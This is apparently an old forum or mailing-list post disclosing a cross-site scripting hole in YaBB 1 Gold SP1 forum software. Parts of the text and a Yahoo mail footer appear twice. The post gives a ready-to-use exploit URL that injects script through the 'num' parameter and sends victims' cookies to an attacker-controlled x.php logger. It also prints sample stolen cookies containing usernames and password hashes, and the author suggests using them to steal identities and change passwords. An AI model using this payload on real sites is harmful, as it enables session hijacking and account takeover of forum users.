num is a post that doesn't exist
board must be a valid and accessable board
X.php script to log the cookie
that in an example of the cookie
268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY
Tested in YaBB 1 Gold - SP1!
i discover this now, i know isnt much but u can do
steal the user identity and maybe u can try to change
the password too (there is another old vuln but i dont
know if work here)
Sorry for my bad english
Bye
_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com
http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=103602
45269<Script>location%3d'Http://www.scriptkiddie.home/x.php?Cookie%3d'%2
b(document.cookie)%3b</Script>
num is a post that doesn't exist
board must be a valid and accessable board
X.php script to log the cookie
that in an example of the cookie
268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY
Tested in YaBB 1 Gold - SP1!
i discover this now, i know isnt much but u can do
steal the user identity and maybe u can try to change
the password too (there is another old vuln but i dont
know if work here)
Sorry for my bad english
Bye
_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com
[ reply ]